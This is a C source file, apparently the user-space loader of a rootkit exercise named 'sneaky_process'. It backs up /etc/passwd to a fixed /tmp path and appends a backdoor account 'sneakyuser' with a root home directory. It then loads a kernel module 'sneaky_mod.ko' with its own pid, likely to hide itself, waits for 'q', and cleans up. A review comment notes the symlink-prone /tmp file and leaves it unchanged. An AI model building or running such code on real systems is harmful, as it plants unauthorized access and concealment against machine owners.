#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <termios.h>
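/*
 * Run an external program and wait for that specific child.
 *
 * argv[0] is the absolute path of the program and doubles as its argv[0];
 * the vector must be NULL-terminated.
 * Returns 0 when the child exited normally with status 0, -1 otherwise
 * (fork failure, exec failure, non-zero exit, or death by signal).
 */
static int run_command(char *const argv[]) {
    pid_t child = fork();
    if (child < 0) {
        perror("fork");
        return -1;
    }
    if (child == 0) {
        execv(argv[0], argv);
        /* Only reached when exec failed. Leave at once so the child never
         * falls through and repeats the parent's remaining steps. */
        perror(argv[0]);
        _exit(127);
    }

    int status = 0;
    if (waitpid(child, &status, 0) < 0) {
        perror("waitpid");
        return -1;
    }
    return (WIFEXITED(status) && WEXITSTATUS(status) == 0) ? 0 : -1;
}

/*
 * Sequence: back up /etc/passwd to /tmp/passwd, append one account line,
 * load sneaky_mod.ko with this process's pid as a module parameter, block
 * until 'q' is read from stdin, then unload the module, restore the file
 * and delete the backup.
 *
 * Writing /etc/passwd and loading a module are expected to need root.
 * The same steps are what the program leaves behind for monitoring: a
 * write to /etc/passwd, a fixed-name file in /tmp, and insmod/rmmod runs.
 *
 * Returns EXIT_SUCCESS only when every step succeeded.
 */
int main(void) {
    /* NOTE(review): /tmp/passwd is a fixed name in a world-writable
     * directory, so cp will follow whatever already exists at that path.
     * Left unchanged here because other components may depend on the
     * name -- confirm before switching to a private temp file. */
    char *backup_cmd[] = {"/usr/bin/cp", "/etc/passwd", "/tmp/passwd", NULL};
    char *restore_cmd[] = {"/usr/bin/cp", "/tmp/passwd", "/etc/passwd", NULL};
    char *delete_cmd[] = {"/usr/bin/rm", "-f", "/tmp/passwd", NULL};
    char *unload_cmd[] = {"/usr/sbin/rmmod", "sneaky_mod", NULL};
    char arg[20];
    /* sneaky_mod.ko is a relative path: it is resolved against the
     * current working directory. */
    char *load_cmd[] = {"/usr/sbin/insmod", "sneaky_mod.ko", arg, NULL};
    struct termios oldt, newt;
    int rc = EXIT_SUCCESS;

    printf("sneaky_process pid = %d\n", getpid());

    // Copy password file
    if (run_command(backup_cmd) != 0) {
        /* Without a backup there is nothing to restore from later, so
         * stop before /etc/passwd is touched. */
        fprintf(stderr, "backup of /etc/passwd failed; nothing was modified\n");
        return EXIT_FAILURE;
    }
    printf("Copied password file\n");

    // Append line
    FILE *passwordFile = fopen("/etc/passwd", "a");
    if (passwordFile == NULL) {
        perror("/etc/passwd");
        rc = EXIT_FAILURE;
        goto delete_backup; /* file was never opened, so it is unmodified */
    }
    int written = fprintf(passwordFile, "sneakyuser:abc123:2000:2000:sneakyuser:/root:bash\n");
    int closed = fclose(passwordFile);
    if (written < 0 || closed != 0) {
        fprintf(stderr, "append to /etc/passwd failed\n");
        rc = EXIT_FAILURE;
        goto restore; /* the file may hold a partial line */
    }
    printf("Appended line to password file\n");

    // Load module
    snprintf(arg, sizeof arg, "pid=%d", (int)getpid());
    if (run_command(load_cmd) != 0) {
        fprintf(stderr, "insmod failed\n");
        rc = EXIT_FAILURE;
        goto restore;
    }
    printf("Loaded module\n");

    // Enter loop
    /* Non-canonical mode delivers each key without waiting for Enter.
     * Only touch the terminal when stdin actually is one; otherwise oldt
     * would be restored from uninitialised contents. */
    int have_tty = (tcgetattr(STDIN_FILENO, &oldt) == 0);
    if (have_tty) {
        newt = oldt;
        newt.c_lflag &= ~(ICANON);
        tcsetattr(STDIN_FILENO, TCSANOW, &newt);
    }
    int ch;
    do {
        ch = getchar();
    } while (ch != 'q' && ch != EOF); /* EOF would otherwise spin forever */
    if (have_tty) {
        tcsetattr(STDIN_FILENO, TCSANOW, &oldt);
    }

    // Unload module
    if (run_command(unload_cmd) != 0) {
        fprintf(stderr, "rmmod failed\n");
        rc = EXIT_FAILURE; /* still restore the password file below */
    } else {
        printf("Unloaded module\n");
    }

restore:
    // Restore password file
    if (run_command(restore_cmd) != 0) {
        /* Keep the backup: it is the only unmodified copy left. */
        fprintf(stderr, "restore of /etc/passwd failed; backup kept at /tmp/passwd\n");
        return EXIT_FAILURE;
    }
    printf("Restored password file\n");

delete_backup:
    // Delete temporary password file
    if (run_command(delete_cmd) != 0) {
        fprintf(stderr, "could not delete /tmp/passwd\n");
        rc = EXIT_FAILURE;
    } else {
        printf("Deleted temporary password file\n");
    }
    return rc;
}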